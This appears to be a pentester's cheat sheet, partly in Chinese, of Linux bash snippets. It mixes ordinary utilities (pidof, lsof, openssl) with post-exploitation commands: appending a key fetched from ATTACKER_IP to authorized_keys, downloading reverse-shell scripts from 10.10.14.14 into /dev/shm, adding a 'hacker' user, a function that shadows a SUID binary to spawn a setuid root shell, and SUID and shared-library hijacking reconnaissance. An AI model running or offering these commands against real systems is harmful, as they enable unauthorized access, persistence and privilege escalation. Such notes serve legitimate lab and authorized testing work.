纯 bash 实现

pidof

#!/bin/sh

# 定义一个函数，参数为进程名
pidof_process() {
    if [ $# -ne 1 ]; then
        echo "Usage: pidof_process <process_name>"
        return 1
    fi

    local process_name="$1"
    local pids

    # 使用 ps 命令查找指定进程名的 PID，并排除自身进程
    pids=($(ps aux | grep "$process_name" | grep -v "grep" | grep -v "$0" | awk '{print $2}'))

    if [ -n "$pids" ]; then
        echo "$pids"
    else
        echo "Process $process_name not found."
    fi
 }

if [ $# -ne 1 ]; then
    echo "Usage: pidof_process <process_name>"
fi

pidof_process $1

‍

通过 pid 获取进程加载的动态库

#!/bin/bash

# 定义一个函数，参数为进程的 PID
list_shared_libraries() {
    local pid="$1"
    local maps_file="/proc/$pid/maps"

    # 检查指定的 PID 是否存在
    if [ ! -e "$maps_file" ]; then
        echo "Process with PID $pid not found."
        return 1
    fi

    # 使用 awk 解析 maps 文件，并打印包含 ".so" 的行的第6列，然后去重
    local libraries
    libraries=($(awk '/\.so/ {print $6}' "$maps_file" | sort -u))

    # 输出数组的内容
    for library in "${libraries[@]}"; do
        echo "$library"
    done
}

# 检查参数是否为空
if [ -z "$1" ]; then
    echo "Usage: $0 <PID>"
    exit 1
fi

# 调用函数并传递进程的 PID 作为参数，将结果捕获到变量
result=($(list_shared_libraries "$1"))

# 输出捕获到的结果数组
for library in "${result[@]}"; do
    echo "$library"
done

‍

安装公钥

curl https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys

‍

下载文件到内存

#Download in RAM
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py

‍

lsof

#Files used by network processes
lsof #Open files belonging to any process
lsof -p 3 #Open files used by the process
lsof -i #Files used by networks processes
lsof -i 4 #Files used by network IPv4 processes
lsof -i 6 #Files used by network IPv6 processes
lsof -i 4 -a -p 1234 #List all open IPV4 network files in use by the process 1234
lsof +D /lib #Processes using files inside the indicated dir
lsof -i :80 #Files uses by networks processes
fuser -nv tcp 80

‍

useradd

useradd -p 'openssl passwd -1 <Password>' hacker  

‍

http server

python -m SimpleHTTPServer 80
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
php -S $ip:80

‍

curl

#json data
curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
#Auth via JWT
curl -X GET -H 'Authorization: Bearer <JWT>' http://host:3000/endpoint

‍

openssl

# Openssl
openssl s_client -connect 10.10.10.127:443 #Get the certificate from a server
openssl x509 -in ca.cert.pem -text #Read certificate
openssl genrsa -out newuser.key 2048 #Create new RSA2048 key
openssl req -new -key newuser.key -out newuser.csr #Generate certificate from a private key. Recommended to set the "Organizatoin Name"(Fortune) and the "Common Name" ([email protected])
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Create certificate
openssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 #Create a signed certificate
openssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem #Create from the signed certificate the pkcs12 certificate format (firefox)
# If you only needs to create a client certificate from a Ca certificate and the CA key, you can do it using:
openssl pkcs12 -export -in ca.cert.pem -inkey ca.key.pem -out client.p12
# Decrypt ssh key
openssl rsa -in key.ssh.enc -out key.ssh
#Decrypt
openssl enc -aes256 -k <KEY> -d -in backup.tgz.enc -out b.tgz

‍

sudo suid

sudo -l #Check commands you can execute with sudo
find / -perm -4000 2>/dev/null #Find all SUID binaries

function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service #Then, when you call the suid binary, this function will be executed

strace <SUID-BINARY> 2>&1 | grep -i -E "open|access|no such file"

‍

Shared Object Hijacking

# Lets find a SUID using a non-standard library
ldd some_suid
something.so => /lib/x86_64-linux-gnu/something.so

# The SUID also loads libraries from a custom location where we can write
readelf -d payroll  | grep PATH
0x000000000000001d (RUNPATH)            Library runpath: [/development]

‍

gen passwd

openssl passwd -1 -salt hacker hacker
mkpasswd -m SHA-512 hacker
python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'

‍

Script/Binaries in PATH

for d in `echo $PATH | tr ":" "\n"`; do find $d -name "*.sh" 2>/dev/null; done
for d in `echo $PATH | tr ":" "\n"`; do find $d -type f -executable 2>/dev/null; done

‍